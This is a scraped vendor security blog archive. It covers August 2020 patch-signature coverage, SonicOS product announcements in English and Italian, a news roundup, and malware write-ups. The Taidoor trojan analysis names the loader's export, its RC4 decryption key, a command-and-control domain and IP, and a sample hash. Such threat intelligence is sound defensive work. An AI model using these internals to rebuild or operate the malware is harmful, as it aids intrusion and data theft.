Microsoft Security Bulletin Coverage for August 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-1380 Scripting Engine Memory Corruption Vulnerability
IPS 15107:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)
IPS 15109:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1380)2

CVE-2020-1464 Windows Spoofing Vulnerability
ASPY 5983:Malformed-File msi.MP.1

CVE-2020-1472 Netlogon Elevation of Privilege Vulnerability
IPS 15143:Windows Netlogon Elevation of Privilege Vulnerability(CVE-2020-1472)

CVE-2020-1480 Windows GDI Elevation of Privilege Vulnerability
IPS 2282:BAD-FILES: Suspicious Executable File Download 9

CVE-2020-1529 Windows GDI Elevation of Privilege Vulnerability
ASPY 5982:Malformed-File exe.MP.150

CVE-2020-1566 Windows Kernel Elevation of Privilege Vulnerability
ASPY 5452:Malformed-File exe.MP.64

CVE-2020-1567 MSHTML Engine Remote Code Execution Vulnerability
IPS 15105:MSHTML Engine Remote Code Execution (CVE-2020-1567)

CVE-2020-1570 Scripting Engine Memory Corruption Vulnerability
IPS 15106:Scripting Engine Memory Corruption Vulnerability (CVE-2020-1570)

CVE-2020-1578 Windows Kernel Information Disclosure Vulnerability
ASPY 5981:Malformed-File exe.MP.152

CVE-2020-1584 Windows dnsrslvr.dll Elevation of Privilege Vulnerability
ASPY 5980:Malformed-File exe.MP.151

CVE-2020-1587 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
ASPY 5979:Malformed-File exe.MP.153

Adobe Coverage:

CVE-2020-9697 Acrobat Reader Disclosure of Sensitive Data
ASPY 5984:Malformed-File pdf.MP.334

CVE-2020-9693 Acrobat Reader Arbitrary Code Execution
ASPY 5985:Malformed-File pdf.MP.335

Following vulnerabilities do not have exploits in the wild :

CVE-2020-0604 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1046 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1337 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1339 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1377 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1378 Windows Registry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1379 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1383 Windows RRAS Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1417 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1455 Microsoft SQL Server Management Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1459 Windows ARM Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1466 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1467 Windows Hard Link Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1470 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.

CVE-2020-1473 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1474 Windows Image Acquisition Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1475 Windows Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1476 ASP.NET and .NET Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1477 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1478 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1479 DirectX Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1483 Microsoft Outlook Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1484 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1485 Windows Image Acquisition Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1486 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1487 Media Foundation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1488 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1489 Windows CSC Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1490 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1492 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1493 Microsoft Outlook Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1494 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1495 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1496 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1497 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1498 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1499 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1500 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1501 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1502 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1503 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1504 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1505 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1509 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1510 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1511 Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1512 Windows State Repository Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1513 Windows CSC Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1515 Windows Telephony Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1516 Windows Work Folders Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1517 Windows File Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1518 Windows File Server Resource Management Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1519 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1520 Windows Font Driver Host Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1521 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1522 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1524 Windows Speech Shell Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1525 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1526 Windows Network Connection Broker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1527 Windows Custom Protocol Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1528 Windows Radio Manager API Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1530 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1531 Windows Accounts Control Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1533 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1534 Windows Backup Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1535 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1536 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1537 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1538 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1539 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1540 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1541 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1542 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1543 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1544 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1545 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1546 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1547 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1548 Windows WaasMedic Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1549 Windows CDP User Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1550 Windows CDP User Components Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1551 Windows Backup Engine Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1552 Windows Work Folder Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1553 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1554 Media Foundation Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1555 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1556 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1557 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1558 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1560 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1561 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1562 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1563 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1564 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1565 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1568 Microsoft Edge PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1569 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-1571 Windows Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1573 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1574 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1577 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1579 Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1580 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1581 Microsoft Office Click-to-Run Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1582 Microsoft Access Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1583 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1585 Microsoft Windows Codecs Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1591 Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1597 ASP.NET Core Denial of Service Vulnerability
There are no known exploits in the wild.

New SonicWall SonicOSX 7.0 and SonicOS 7.0 Operating Systems Offer Visibility and Simplicity

/0 Comments/in /by

Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.

As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.

SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.

To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.

The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.

The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.

With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.

This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.

SonicOSX 7 also provides unified policy to provision L3 to L7 controls in a single rule base on every firewall, providing admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. SonicOSX’s web-based interface presents meaningful visualizations of threat information, and displays actionable alerts prompting you to configure contextual security policies with point-and-click simplicity.

In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of various security rules. The user is then able to modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, and deep-packet inspection of encrypted traffic in a seamless fashion. With Unified Policy, SonicWall delivers a more streamlined experience that reduces configuration errors and deployment time for a better overall security posture.

The Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that affect gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It helps simplify management tasks, reduce configuration errors and speed up deployment time, which all contribute to a better overall security posture.

To learn more, visit www.sonicwall.com/sonicos

Sicurezza, semplicità e valore con le nuove soluzioni SonicWall

/0 Comments/in /by

Se ne parlava da anni: il futuro è il telelavoro. Il nuovo ufficio è dove ci si trova. L’era del lavoro in mobilità porterà nuovi livelli di produttività, flessibilità e soddisfazione del personale.

Ma nessuno aveva previsto che la rivoluzione del telelavoro sarebbe arrivata tutta in una volta, né che sarebbe stata inevitabile. Nel bel mezzo della pandemia l’adozione di politiche di telelavoro ha contribuito a garantire non solo la sicurezza dei dipendenti, ma anche la continuità operativa. Ma la nuova imponente schiera di lavoratori da remoto e in mobilità del tutto impreparati ha portato con sé rischi mai visti prima per quanto riguarda la cybersecurity.

Se qualcosa di fondamentale come il modo di lavorare a livello mondiale può essere cambiato per sempre, i concetti alla base della cybersecurity illimitata sono più attuali che mai. Le organizzazioni devono proteggersi dalla crescita esponenziale dei punti di esposizione e dai rischi legati al personale che lavora da casa e in mobilità.

Devono poter essere in grado di bloccare i ciberattacchi noti e quelli sconosciuti che cercano di sfruttare qualsiasi vulnerabilità indotta dalla nuova normalità operativa. Inoltre devono mettere in sicurezza e riprogettare le reti ampiamente distribuite, per non farsi trovare impreparate per un futuro completamente diverso.

Mentre il mondo dell’informatica si trova a dover affrontare di petto queste sfide, SonicWall sta rafforzando il suo impegno per una cybersecurity illimitata.

Il futuro della cybersecurity illimitata di SonicWall è incentrato sulla semplificazione dell’esperienza della sicurezza. Stiamo intervenendo in quattro modi principali:

  • Fornire un’esperienza utente innovativa, razionalizzare i controlli di sicurezza della rete e consentire la visibilità su tutta la rete con un’interfaccia moderna, intuitiva e di facile comprensione
  • Semplificare l’esperienza di sicurezza per le imprese distribuite e gli enti pubblici con una piattaforma più accessibile, flessibile e facile da installare
  • Offrire alle organizzazioni diversi modi per aumentare la visibilità e mantenere il controllo dei dati, identificando e bloccando i ciberattacchi noti e quelli sconosciuti che si verificano nella nuova normalità operativa odierna
  • Ridefinire l’amministrazione della sicurezza per semplificarla e renderla più accessibile grazie ai nuovi firewall TZ multi-gigabit compatibili con la modalità a sfioramento, dotati di funzionalità SD-Branch sicure e di una consolle di gestione nativa per il cloud riprogettata

Oggi annunciamo uno dei più importanti lanci di prodotti nella storia della nostra azienda. Complessivamente, si tratta di un sistema operativo completamente nuovo con cinque tra nuovi prodotti e migliorie apportate alle soluzioni esistenti per la piattaforma Capture Cloud, vale a dire:

  • SonicOS 7.0: razionalizza l’esperienza della sicurezza con un’interfaccia altamente intuitiva, garantendo la familiarità e riducendo le esigenze di formazione e i tempi d’installazione. L’interfaccia utente e l’esperienza dell’utente riprogettate rappresentano un valido compromesso tra praticità e controllo, con pannelli di controllo dei dispositivi, topologie riprogettate, supporto dell’app mobile SonicExpress e semplificazione della definizione e della gestione delle politiche.
  • SonicOSX 7.0: contribuisce a rendere più efficienti i governi e le imprese distribuite grazie ai maggiori livelli di modularità, protezione e controllo. Il sistema operativo migliorato semplifica le politiche, le verifiche e la gestione, offrendo maggiori livelli di visibilità grazie a un’interfaccia utente e a un’esperienza dell’utente appositamente concepite per i governi e le imprese distribuite.
  • SonicWall Network Security Manager (NSM) 2.0 SaaS: si caratterizza per una velocità, una modularità e un’affidabilità senza precedenti per la gestione completa dei firewall nelle grandi aziende distribuite. Il NSM nativo per il cloud consente alle organizzazioni di ottimizzare, controllare, monitorare e gestire da qualsiasi luogo decine di migliaia di dispositivi di sicurezza di rete, compresi i firewall, gli switch gestiti e gli access point wireless sicuri attraverso una semplice interfaccia cloud.
  • SonicWall NSsp 15700: dispone di diverse interfacce GbE 100/40/10, di funzionalità rivoluzionarie multi-istanza e di analisi delle minacce ad alta velocità, che consentono alle organizzazioni di proteggere milioni di connessioni senza compromettere la sicurezza. Progettati per imprese, governi, data center e società di servizi, questi firewall di fascia alta costituiscono una garanzia per il futuro degli investimenti, consentendo di modulare i sistemi di sicurezza in modo da soddisfare i requisiti di connessione dinamica in funzione dell’aumento costante del numero di dispositivi e di utenti.
  • SonicWall CSa 1000: rende disponibile il premiato servizio Capture ATP di SonicWall, offrendo ai governi, alle strutture di sanità pubblica e alle altre organizzazioni soggette ad obblighi di conformità o a limitazioni alla conservazione dei dati la stessa protezione di cui godono attualmente nel cloud. Potenziato con la tecnologia Real-Time Deep Memory InspectionTM (RTDMI), CSa 1000 è in grado di analizzare tutta una serie di tipi di file, individuando e bloccando le minacce di tipo exploit zero-day, i file sospetti e persino gli attacchi su canale laterale come Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS e TPM-Fail.
  • SonicWall TZ570 e TZ670: sono i primi firewall di tipo desktop dotati di interfacce multi-gigabit (5/10 G) per la connettività con gli switch SonicWall e altri dispositivi di rete per installazioni di tipo SD-Branch, il tutto con velocità di rilevamento delle minacce fino a 2,5 Gbps. Questi firewall di prossima generazione sono caratterizzati da sicurezza SD-WAN integrata, installazione di tipo Zero-Touch, compatibilità TLS 1.3 e 5G ed altre funzioni innovative, che consentono di ridurre i costi e risparmiare tempo.

SonicWall è da sempre impegnata a proteggere le PMI, le imprese e gli enti pubblici di tutto il mondo. Oggi è più che mai facile realizzare la vera cybersecurity liberandosi dalle pastoie del passato. Per ulteriori informazioni sui nuovi prodotti e sulle migliorie di SonicWall consultare il comunicato stampa, rivolgersi ad un consulente di sicurezza di SonicWall o controllare i prossimi aggiornamenti a cura dei nostri esperti in materia di sicurezza, che illustreranno più nel dettaglio le caratteristiche dei nuovi prodotti più importanti.

SonicWall significa cybersecurity illimitata per l’era iperdistribuita.

New SonicWall Solutions Deliver Security, Simplicity and Value

/0 Comments/in , /by

It’s been talked about for years: Remote work is the future. The new office is wherever you are. The era of mobile employees will bring new levels of productivity, agility and worker satisfaction.

But no one predicted that the remote-work revolution would arrive all at once — or that it would be mandatory. In the midst of the pandemic, adopting work-from-home policies helped ensure both employee safety and business continuity. But the massive new cohort of unprepared remote and mobile workers brought with it unprecedented cybersecurity risks.

While something as fundamental as the way the world does work may have changed forever, the ideals of Boundless Cybersecurity are more relevant than ever. Organizations need to protect against the explosion of exposure points and risks from remote and mobile workforces.

They need the ability stop known and unknown cyberattacks targeting any vulnerability in this new business normal. And they need to secure and rearchitect massively distributed networks in preparation for a future significantly changed.

As the IT world turns to face these challenges head on, SonicWall is stepping up its commitment to Boundless Cybersecurity.

The future of SonicWall Boundless Cybersecurity is focused on simplifying the security experience. We are delivering that in four key ways:

  • Provide an innovative user experience, streamline network security controls and deliver whole-network visibility with modern, intuitive and easy-to-understand interface
  • Simplify the security experience for distributed enterprises and government agencies with a more approachable, flexible and easy-to-implement platform
  • Deliver more ways for organizations to increase visibility and maintain data control while identifying and stopping the known and unknown cyberattacks persistent in today’s new business normal
  • Re-define security administration so it’s easier and more accessible with new zero touch-enabled, multi-gigabit TZ firewalls, secure SD-Branch capabilities and a redesigned, cloud-native management console

Today, we announce one of the most monumental product launches in the history of our company. In all, this effort includes a reimagined operating system and five new products or solution enhancements to the Capture Cloud Platform:

  • SonicOS 7.0 — Streamlines the security experience with a highly intuitive interface, ensuring familiarity, reducing training and slashing deployment times. The redesigned UI/UX balances convenience and control, offering device dashboards, redesigned topologies, SonicExpress mobile app support, and simplified policy creation and management.
  • SonicOSX 7.0 — Empowers governments and distributed enterprises with greater levels of scalability, protection and control. The enhanced OS simplifies policy, auditing and management — offering greater levels of visibility with a UI/UX designed for distributed enterprises and governments.
  • SonicWall Network Security Manager (NSM) 2.0 SaaS — Offers unprecedented speed, scalability and reliability for comprehensive firewall management across the largest distributed enterprises. The cloud-native NSM enables organizations to optimize, control, monitor and manage tens of thousands of network security devices — including firewalls, managed switches and secure wireless access points — from anywhere via a simple cloud interface.
  • SonicWall NSsp 15700 — Offers multiple 100/40/10 GbE interfaces, revolutionary multi-instance capabilities and high-speed threat analysis, enabling organizations to safeguard millions of connections without compromising security. Designed for enterprises, governments, data centers and service providers, these high-end firewalls future-proof your investment by allowing you to scale security to meet dynamic connection requirements as the number of devices and users continues to grow.
  • SonicWall CSa 1000 — Brings SonicWall’s award-winning Capture ATP service on-prem, giving government, healthcare and other organizations subject to compliance or data residency restrictions the same protection currently offered in the cloud. Enhanced with Real-Time Deep Memory InspectionTM (RTDMI), CSa 1000 analyzes a broad range of file types, detecting and blocking threats that target zero-day exploits, suspicious files and even side-channel attacks, such as Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS and TPM-Fail.
  • SonicWall TZ570 & TZ670 — Represents the first desktop firewall form factor to offer multi-gigabit (5/10G) interfaces for connectivity with SonicWall Switches or other networking devices in SD-Branch deployments — all with threat prevention speeds up to 2.5 Gbps. These next-generation firewalls feature integrated secure SD-WAN, Zero-Touch Deployment, TLS 1.3 and 5G support, and more innovative features that reduce costs and save time.

SonicWall’s commitment has always been to help protect SMBs, enterprises and government agencies worldwide. And now, it’s never been easier to realize true cybersecurity by breaking free from the constraints of the past. To learn more about SonicWall’s new products and enhancements, review our press release, contact a SonicWall security expert, or check back over the coming days as our security experts offer a closer look into each major new product.

SonicWall is Boundless Cybersecurity for the hyper-distributed era.

Cybersecurity News & Trends – 08-07-20

/0 Comments/in /by

This week, hackers dominated the headlines. But from financial firms, to voting machines, to entire countries, many are beginning to mount a stronger defense.

SonicWall Spotlight

AT&T Cybersecurity: Do Secure VPNs, Don’t Pay Ransoms — SDxCentral

  • The author notes that, per SonicWall’s mid-year update to the 2020 Cyber Threat Report, there was a 20% jump in ransomware globally in the first half of 2020 compared to mid-year 2019, including a staggering 109% spike in the U.S.

3 Tips For Improving Your Cybersecurity Program This School Year — EdTech Magazine

  • As schools prepare to reopen, EdTech Magazine offers three ways districts can improve their cybersecurity programs.

Covid-19 pandemic: Russian hackers target UK, US and Canadian research — Pharmaceutical Technology

  • Security services in the UK, US and Canada have determined that Russian cyber hacking group APT29 has attempted to illicitly access Covid-19 research. SonicWall CEO Bill Conner discusses how state-sponsored espionage groups are targeting medical data.

Cybersecurity News

Insecure satellite Internet is threatening ship and plane safety — Ars Technica

  • At the Black Hat security conference, researcher James Pavur presented findings that show that satellite-based Internet is putting millions at risk despite safeguards implemented by providers.

How the US Can Prevent the Next ‘Cyber 9/11’ — Wired

  • In an interview with WIRED, former national intelligence official Sue Gordon discusses Russian election interference and other digital threats to democracy.

U.S. Government Launches Cyber Career Path Tool — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week announced the launch of a free tool designed to help users identify and navigate a potential career path.

U.S. coronavirus fraud losses near $100 million as COVID scams double — Reuters

  • U.S. losses from coronavirus-related fraud and identity theft have reached nearly $100 million, while complaints of COVID-19 scams have at least doubled in most states.

Financial Firms’ Cybersecurity Spending Jumps 15%, Survey Finds — Bloomberg

  • Big banks and other financial firms are spending 15% more this year to defend computer networks from cyber criminals, and the pandemic and work-from-home arrangements are probably spurring further increases.

Hackers Get Green Light to Test U.S. Voting Systems — The Wall Street Journal

  • Election Systems & Software, the top U.S. seller of voting-machine technology, is calling a truce in its feud with computer security researchers over the ways they probe for vulnerabilities of the company’s systems.

Hackers can abuse Microsoft Teams updater to install malware — Bleeping Computer

  • Microsoft Teams can still double as a Living off the Land binary (LoLBin) and help attackers retrieve and execute malware from a remote location.

Robots Running the Industrial World Are Open to Cyber Attacks — Bloomberg

  • According to a new report titled “Rogue Automation,” some robots have flaws that could make them vulnerable to advanced hackers, who could steal data or alter a robot’s movements remotely.

Interpol Warns of ‘Alarming’ Cybercrime Rate During Pandemic — Security Week

  • Global police body Interpol has warned of an “alarming” rate of cybercrime during the coronavirus pandemic.

CISA, DOD, FBI expose new versions of Chinese malware strain named Taidoor — ZDNet

  • U.S. government agencies say the Taidoor remote access trojan (RAT) has been used as far back as 2008.

Exclusive: China-backed hackers ‘targeted COVID-19 vaccine firm Moderna’ — Reuters

  • Chinese government-linked hackers targeted biotech company Moderna Inc., a U.S.-based coronavirus vaccine research developer, this year in a bid to steal data, according to a U.S. security official.

Hackers Are Targeting the Remote Workers Who Keep Your Lights On — Bloomberg

  • With many of the people who help keep the grid running now working from home, cyberattacks targeting the power sector have surged.

Hackers Broke Into Real News Sites to Plant Fake Stories — Wired

  • A disinformation operation broke into the content management systems of Eastern European media outlets in a campaign to spread misinformation about NATO.

In Case You Missed It

Chinese Remote Access Trojan Taidoor

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently observed activity for the Chinese Remote Access Trojan Taidoor. Taidoor is composed of two stages, the loader and RAT module. The loader starts the service and decrypts the second file. The loader uses its export function “MyStart” for the initial infection. The function will allocate memory space for a new file called “svchost.dll”.

Before the new file is called it will have to go through a series of routines to decrypt the contents of the file. The DLL uses RC4 encryption, the key is actually rebuilt using the following sting: “ar1zyAXt7d6556sAsvchUQc2”. Once filtered, the RC4 key will be: “ar1z7d6556sAyAXtUQc2”.

The RC4 algorithm is also used to decrypt the import names and other related strings.

DLL Loader Layer, Static Information:

Checking binary static information… (Not Corrupted)…

PDB:

Exports:

DllMain:

RC4 Prefiltered Key:

Dynamic Information:

Looking inside “MyStart” Export Routine:

Creating the RAT module:

Once the svchost dll is allocated in memory it will cycle the exports and located the “Start” export routine in the new dll.

Calling the call routine to start the Remote Access Trojan module:

Network Artifacts:

Command and Control Information:

  • cnaweb.mrslove.com
  • 210.68.69.82

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: Taidoor.LD

Appendix:

Sample SHA256 Hash: 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4

Fake Chinese Word Processing App installs an Infostealer Trojan

/in /by

The Sonicwall Capture Labs Research team has come across a Chinese word processor that comes packaged with an infostealer. This word processor comes as a Nullsoft installer and appears to be a legitimate notepad or Word application alternative.

Infection Cycle:

This Trojan comes as an NSIS installer and uses the following icon:

Upon execution, it guides the user through a typical software installation prompts and then launches the word processing app window.

However, upon further inspection, it appears that it launched the word processing app alongside another copy of AllRoundPad.exe.

Simultaneously, several connections to remote servers were made.

This Trojan has accessed personal information including browsing history, user IP, location among others. It also attempts to access and modify the system’s internet settings.

It creates .tmp files in the %temp% directory with information gathered regarding the victim’s machine. These are then later sent out to a remote server.

This installation comes with an uninstaller. However using the uninstaller only removes the word processing app and leaves behind a copy of the Trojan in the %temp% directory which is responsible for all the malicious behaviors observed.

We urge our users to only use official and reputable websites as their source of software programs. Always be vigilant and cautious when installing software applications particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Chindo.AB_4 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

What’s the Malware Capital of the US?

/0 Comments/in /by

A lot of the dangers in the U.S. follow logical and predictable patterns. If you want to avoid tornadoes, you shouldn’t live in Oklahoma, Kansas or Nebraska. If you’re worried about hurricanes and earthquakes, you should avoid the East Coast and West Coast, respectively.

